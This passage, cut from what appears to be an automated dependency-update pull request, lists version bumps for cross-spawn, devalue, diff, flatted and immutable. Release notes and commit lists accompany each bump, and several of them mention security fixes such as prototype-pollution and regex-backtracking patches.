href=\"https://github.com/moxystudio/node-cross-spawn/commit/9a7e3b2165917367f74b8365faad9873b30d7263\"\u003e\u003ccode\u003e9a7e3b2\u003c/code\u003e\u003c/a\u003e chore: fix build status badge\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/085268352dcbcad8064c64c5efb25268b4023184\"\u003e\u003ccode\u003e0852683\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e\u003ccode\u003e640d391\u003c/code\u003e\u003c/a\u003e fix: fix escaping bug introduced by backtracking\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/bff0c87c8b627c4e6d04ec2449e733048bebb464\"\u003e\u003ccode\u003ebff0c87\u003c/code\u003e\u003c/a\u003e chore: remove codecov\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/a7c6abc6fee79641d45b452fe6217deaa1bd0973\"\u003e\u003ccode\u003ea7c6abc\u003c/code\u003e\u003c/a\u003e chore: replace travis with github workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9b9246e0969e86656d7ccd527716bc3c18842a19\"\u003e\u003ccode\u003e9b9246e\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e\u003ccode\u003e5ff3a07\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `devalue` from 4.3.2 to 5.6.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/devalue/releases\"\u003edevalue's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.6.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e87c1f3c: fix: reject \u003ccode\u003e__proto__\u003c/code\u003e keys in malformed \u003ccode\u003eObject\u003c/code\u003e wrapper payloads\u003c/p\u003e\n\u003cp\u003eThis validates the \u003ccode\u003e\u0026quot;Object\u0026quot;\u003c/code\u003e parse path and throws when the wrapped value has an own \u003ccode\u003e__proto__\u003c/code\u003e key.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e40f1db1: fix: ensure sparse array indices are integers\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e87c1f3c: fix: disallow \u003ccode\u003e__proto__\u003c/code\u003e keys in null-prototype object parsing\u003c/p\u003e\n\u003cp\u003eThis disallows \u003ccode\u003e__proto__\u003c/code\u003e keys in the \u003ccode\u003e\u0026quot;null\u0026quot;\u003c/code\u003e parse path so null-prototype object hydration cannot carry that key through parse/unflatten.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.6.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e0f04d4d: fix: Properly handle \u003ccode\u003e__proto__\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e819f1ac: fix: better encoding for sparse arrays\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.6.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e1175584: fix: validate input for \u003ccode\u003eArrayBuffer\u003c/code\u003e parsing\u003c/li\u003e\n\u003cli\u003ee46afa6: fix: validate input for typed arrays\u003c/li\u003e\n\u003cli\u003e1175584: fix: more helpful errors for inputs causing stack overflows\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.6.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2161d44: fix: add hasOwn check before calling reviver\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.6.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea3d09d4: feat: expose \u003ccode\u003eDevalueError\u003c/code\u003e for \u003ccode\u003einstanceof\u003c/code\u003e checks in \u003ccode\u003ecatch\u003c/code\u003e clauses\u003c/li\u003e\n\u003cli\u003ea3d09d4: feat: add \u003ccode\u003evalue\u003c/code\u003e and \u003ccode\u003eroot\u003c/code\u003e properties in \u003ccode\u003eDevalueError\u003c/code\u003e instances\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e828fa1c: Enable support for custom reducer/reviver for \u0026quot;function\u0026quot; values\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.4.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e5c26c0d: fix: allow custom revivers to revive things serialized by builtin reducers\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.4.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/devalue/blob/main/CHANGELOG.md\"\u003edevalue's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.6.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e87c1f3c: fix: reject \u003ccode\u003e__proto__\u003c/code\u003e keys in malformed \u003ccode\u003eObject\u003c/code\u003e wrapper payloads\u003c/p\u003e\n\u003cp\u003eThis validates the \u003ccode\u003e\u0026quot;Object\u0026quot;\u003c/code\u003e parse path and throws when the wrapped value has an own \u003ccode\u003e__proto__\u003c/code\u003e key.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e40f1db1: fix: ensure sparse array indices are integers\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e87c1f3c: fix: disallow \u003ccode\u003e__proto__\u003c/code\u003e keys in null-prototype object parsing\u003c/p\u003e\n\u003cp\u003eThis disallows \u003ccode\u003e__proto__\u003c/code\u003e keys in the \u003ccode\u003e\u0026quot;null\u0026quot;\u003c/code\u003e parse path so null-prototype object hydration cannot carry that key through parse/unflatten.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.6.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e0f04d4d: fix: Properly handle \u003ccode\u003e__proto__\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e819f1ac: fix: better encoding for sparse arrays\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.6.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e1175584: fix: validate input for \u003ccode\u003eArrayBuffer\u003c/code\u003e parsing\u003c/li\u003e\n\u003cli\u003ee46afa6: fix: validate input for typed arrays\u003c/li\u003e\n\u003cli\u003e1175584: fix: more helpful errors for inputs causing stack overflows\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.6.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2161d44: fix: add hasOwn check before calling reviver\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.6.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea3d09d4: feat: expose \u003ccode\u003eDevalueError\u003c/code\u003e for \u003ccode\u003einstanceof\u003c/code\u003e checks in \u003ccode\u003ecatch\u003c/code\u003e clauses\u003c/li\u003e\n\u003cli\u003ea3d09d4: feat: add \u003ccode\u003evalue\u003c/code\u003e and \u003ccode\u003eroot\u003c/code\u003e properties in \u003ccode\u003eDevalueError\u003c/code\u003e instances\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e828fa1c: Enable support for custom reducer/reviver for \u0026quot;function\u0026quot; values\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.4.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/6cbb3f51258e01d7769e2b3d77b6ce9ed060804b\"\u003e\u003ccode\u003e6cbb3f5\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://redirect.github.com/sveltejs/devalue/issues/133\"\u003e#133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/40f1db13afdd65c8e2ebd02f684276c273ef81b0\"\u003e\u003ccode\u003e40f1db1\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/87c1f3ce3759765a061cfe34843ecc4b0711ba8d\"\u003e\u003ccode\u003e87c1f3c\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/a4a37d208a4d1bdd0d58c82e5644c87cab855259\"\u003e\u003ccode\u003ea4a37d2\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://redirect.github.com/sveltejs/devalue/issues/132\"\u003e#132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/819f1ac7475ab37547645cfb09bf2f678a799cf0\"\u003e\u003ccode\u003e819f1ac\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/0f04d4d678eac39ad5d7a07d1956275d7874e81c\"\u003e\u003ccode\u003e0f04d4d\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/fcf4e88275f2e2e45b9ea70ffaa5247c8f55f057\"\u003e\u003ccode\u003efcf4e88\u003c/code\u003e\u003c/a\u003e fix tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/1d8a5ea5863bcd9992755ce5a3842265753cb4ab\"\u003e\u003ccode\u003e1d8a5ea\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://redirect.github.com/sveltejs/devalue/issues/131\"\u003e#131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/11755849fa0634ae294a15ec0aef2f43efcad7c4\"\u003e\u003ccode\u003e1175584\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/e46afa64dd2b25aa35fb905ba5d20cea63aabbf7\"\u003e\u003ccode\u003ee46afa6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/devalue/compare/v4.3.2...v5.6.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for devalue since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `diff` from 5.2.0 to 5.2.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kpdecker/jsdiff/blob/master/release-notes.md\"\u003ediff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.2 - January 2026\u003c/h2\u003e\n\u003cp\u003eOnly change from 5.2.0 is a backport of the fix to \u003ca href=\"https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\"\u003ehttps://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003ev5.2.1 (deprecated)\u003c/h2\u003e\n\u003cp\u003eAccidental release - do not use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b7b6339dea15baa636bebe7092ec1cbabf001dea\"\u003e\u003ccode\u003eb7b6339\u003c/code\u003e\u003c/a\u003e v5.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b5377abefc55cd424e82308515cfbdc4d53ad8a1\"\u003e\u003ccode\u003eb5377ab\u003c/code\u003e\u003c/a\u003e Update package version to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/78017899c4c80d51db805b6e013079cadc6ed0ae\"\u003e\u003ccode\u003e7801789\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/649\"\u003ekpdecker/jsdiff#649\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/042a8372f331ffd3d81b1e4b799409c7d944e6fd\"\u003e\u003ccode\u003e042a837\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/647\"\u003ekpdecker/jsdiff#647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/kpdecker/jsdiff/compare/v5.2.0...v5.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.3.1 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.3.1...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `immutable` from 4.3.5 to 4.3.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/immutable-js/immutable-js/releases\"\u003eimmutable's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.3.8\u003c/h2\u003e\n\u003cp\u003eFix Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in immutable\u003c/p\u003e\n\u003ch2\u003ev4.3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue with slice negative of filtered sequence by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2006\"\u003eimmutable-js/immutable-js#2006\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.3.6...v4.3.7\"\u003ehttps://github.com/immutable-js/immutable-js/compare/v4.3.6...v4.3.7\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.3.6\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix Repeat(\u003c!-- raw HTML omitted --\u003e).equals(undefined) incorrectly returning true by \u003ca href=\"https://github.com/butchler\"\u003e\u003ccode\u003e@​butchler\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1994\"\u003eimmutable-js/immutable-js#1994\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternals\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echange youtube image by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1973\"\u003eimmutable-js/immutable-js#1973\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade eslint and ignore no-constructor-return rule for actual constructors by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1974\"\u003eimmutable-js/immutable-js#1974\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupgrate documentation website to next 14 by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1975\"\u003eimmutable-js/immutable-js#1975\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003estart migrating to nextjs app router by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1976\"\u003eimmutable-js/immutable-js#1976\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupgrade next sitemap by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1978\"\u003eimmutable-js/immutable-js#1978\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/butchler\"\u003e\u003ccode\u003e@​butchler\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1994\"\u003eimmutable-js/immutable-js#1994\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.3.5...v4.3.6\"\u003ehttps://github.com/immutable-js/immutable-js/compare/v4.3.5...v4.3.6\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/immutable-js/immutable-js/blob/main/CHANGELOG.md\"\u003eimmutable's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\nDates are formatted as YYYY-MM-DD.\u003c/p\u003e\n\u003ch2\u003eUnreleased\u003c/h2\u003e\n\u003ch2\u003e5.1.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in immutable\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.1.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate some files to TS by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2125\"\u003eimmutable-js/immutable-js#2125\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eIterator.ts\u003c/li\u003e\n\u003cli\u003ePairSorting.ts\u003c/li\u003e\n\u003cli\u003etoJS.ts\u003c/li\u003e\n\u003cli\u003eMath.ts\u003c/li\u003e\n\u003cli\u003eHash.ts\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eExtract CollectionHelperMethods and convert to TS by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2131\"\u003eimmutable-js/immutable-js#2131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse npm \u003ca href=\"https://docs.npmjs.com/trusted-publishers\"\u003etrusted publishing only\u003c/a\u003e to avoid token stealing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix/a11y issues by \u003ca href=\"https://github.com/lyannel\"\u003e\u003ccode\u003e@​lyannel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2136\"\u003eimmutable-js/immutable-js#2136\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDoc add Map.get signature update by \u003ca href=\"https://github.com/borracciaBlu\"\u003e\u003ccode\u003e@​borracciaBlu\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2138\"\u003eimmutable-js/immutable-js#2138\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(doc):minor-issues#2132 by \u003ca href=\"https://github.com/JayMeDotDot\"\u003e\u003ccode\u003e@​JayMeDotDot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2133\"\u003eimmutable-js/immutable-js#2133\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix algolia search by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2135\"\u003eimmutable-js/immutable-js#2135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTypo in OrderedMap by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2144\"\u003eimmutable-js/immutable-js#2144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echore: Sort all imports and activate eslint import rule by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2119\"\u003eimmutable-js/immutable-js#2119\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.1.3\u003c/h2\u003e\n\u003ch3\u003eTypeScript\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: allow readonly map entry constructor by \u003ca href=\"https://github.com/septs\"\u003e\u003ccode\u003e@​septs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2123\"\u003eimmutable-js/immutable-js#2123\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cp\u003eThere has been a huge amount of changes in the documentation, mainly migrate from an autogenerated documentation from .d.ts file, to a proper documentation in markdown.\nThe playground has been included on nearly all method examples.\nWe added a page about browser extensions too: \u003ca href=\"https://immutable-js.com/browser-extension/\"\u003ehttps://immutable-js.com/browser-extension/\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/485cbe0edf3ca7bb4b9c4a80ac55ba937a291da0\"\u003e\u003ccode\u003e485cbe0\u003c/code\u003e\u003c/a\u003e 4.3.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/6ed4eb626906df788b08019061b292b90bc718cb\"\u003e\u003ccode\u003e6ed4eb6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/immutable-js/immutable-js/commit/94bcd3c79972db4afffd8d1e5aab415880098b05\"\u003e\u003ccode\u003e94bcd3c\u003c/code\u003e\u003c/a\u003e fix new proto key injection\u003c/li\u003e\n\u003cli\u003e\u003ca 